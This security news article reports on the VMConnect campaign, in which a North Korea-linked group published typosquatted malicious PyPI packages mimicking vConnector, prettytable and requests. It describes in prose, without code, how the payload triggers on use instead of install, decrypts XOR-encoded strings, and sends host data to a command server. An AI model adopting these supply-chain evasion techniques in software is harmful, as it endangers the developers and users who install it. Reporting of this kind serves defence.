ReversingLabs researchers believe that the North Korea-linked APT group Labyrinth Chollima is behind the VMConnect campaign. Threat actors uploaded a series of malicious packages to the PyPI (Python Package Index) repository, including a rogue package posing as the VMware vSphere connector module vConnector named VMConnect targeting IT professionals.
The state-sponsored hackers uploaded the malicious packages in early August.
The APT group uploaded two dozen malicious Python packages to the Python Package Index (PyPI) repository. The researchers were not able to obtain samples of the second-stage malware used in this campaign.
“The packages mimicked popular open-source Python tools, including vConnector, a wrapper module for pyVmomi VMware vSphere bindings; eth-tester, a collection of tools for testing Ethereum-based applications; and databases, a tool that gives asynchronous support for a range of databases.” states the report published by ReversingLabs. “an analysis of the malicious packages used and their decrypted payloads reveals links to previous campaigns attributed to Labyrinth Chollima, an offshoot of Lazarus Group, a North Korean state-sponsored threat group”
The researchers also identified three more malicious Python packages that are believed to be a continuation of the VMConnect campaign: tablediter, request-plus, and requestspro.
tablediter was mimicking the legitimate prettytable Python tool that developers use for printing tables in an attractive ASCII format. Prettytable has more than 9 million monthly downloads, for this reason threat actors are targeting its users with a typosquatting attack.
tablediter is very similar to previously discovered malicious packages in the VMConnect campaign. The most significant difference is that the malicious functionality is not executed when the package is installed, but it is triggered when the package is used in a project. The malicious code is not executed through the __init__.py file during the package installation, instead, it was added to a function called add_row, which is a part of the tablediter class defined in the tablediter.py file. The code will be executed during testing of the application on a developer’s workstation or during execution by a user working with published software that has incorporated the malicious tablediter dependency.
Upon executing the package, the code calls a method from a file, bounding.py, that is located in the edt subdirectory. Then this method receives a parameter that represents an XOR key used to decrypt the content of a hex-encoded string enclosed in the package.
For the other two packages of the trio, request-plus, and requestspro, threat actors appended the “plus” and “pro” suffixes to the name to make them appear as legitimate packages with additional capabilities.
The packages gather information about the infected machine and send it to the C2 server in the form of a POST HTTP request.
The C2 server responds with a Base64/XOR obfuscated Python module with execution parameters. The module also includes the download URL for the next stage payload, which researchers couldn’t retrieve.
The researchers noticed that the module includes the URL for the next stage payload.
“The team believes the module gets executed after decoding and then downloads the next stage of the malware. As was the case in the earlier iteration of the VMConnect campaign, the C2 server associated with the campaign did not provide additional commands by default, but rather waited for a suitable target, making it difficult to assess the full scope of the campaign.” continues the report.
The attribution to the Lazarus subgroup Labyrinth Chollima is based on similarities in the malicious code employed in the campaign. The ‘builder.py’ file in the malicious packages contains the same payload decoding routine that the JPCERT discovered in another file called ‘py_Qrcode’ attributed to the Lazarus subgroup tracked as DangerousPassword.
“Based on those attributions and the described code similarities between the packages discovered in the VMConnect campaign and the campaign described in the research published by JPCERT/CC, the ReversingLabs research team has reached the conclusion that the same threat actor is behind both attacks and, therefore, that the VMConnect malicious campaign activity can be linked to the North Korean state-sponsored Lazarus Group” concludes the report.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, North Korea)